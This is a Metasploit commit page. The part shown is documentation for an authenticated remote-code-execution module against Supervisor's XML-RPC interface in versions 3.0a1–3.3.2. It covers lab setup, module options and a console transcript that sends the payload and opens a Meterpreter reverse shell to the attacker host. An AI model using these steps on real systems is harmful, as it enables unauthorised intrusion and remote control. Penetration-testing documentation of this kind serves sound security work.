adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #8906 RCE for supervisor

Browse Source
This commit is contained in:
h00die
2017-09-24 08:03:30 -04:00
parent d73e95e7db 9528f279a5
commit 4d1e51a0ff
2 changed files with 247 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
+78
View File
@@ -0,0 +1,78 @@
## Vulnerable Application
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
This has been tested with versions 3.2.0 and 3.3.2
### Creating A Testing Environment
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
1. ```sudo apt-get install supervisor```
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
```
[inet_http_server] ; inet (TCP) server disabled by default
port=:9001 ; ip_address:port specifier, *:port for all iface
username=user ; default is no username (open server)
password=123 ; default is no password (open server)
```
3. Restart the service: `sudo service supervisor restart`
## Verification Steps
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```set httpusername user```
5. ```set httppassword 123```
6. ```exploit```
7. A meterpreter session should have been opened successfully
## Options
**HttpUsername**
Username for HTTP basic auth which is set in the conf file(optional)
**HttpPassword**
Password for HTTP basic auth which is set in the conf file(optional)
**TARGETURI**
The path to the XML-RPC endpoint
## Scenarios
### Supervisor 3.2.0 on Xubuntu 16.04
```
msf > use exploit/linux/http/supervisor_xmlrpc_exec
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check
[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
meterpreter >
```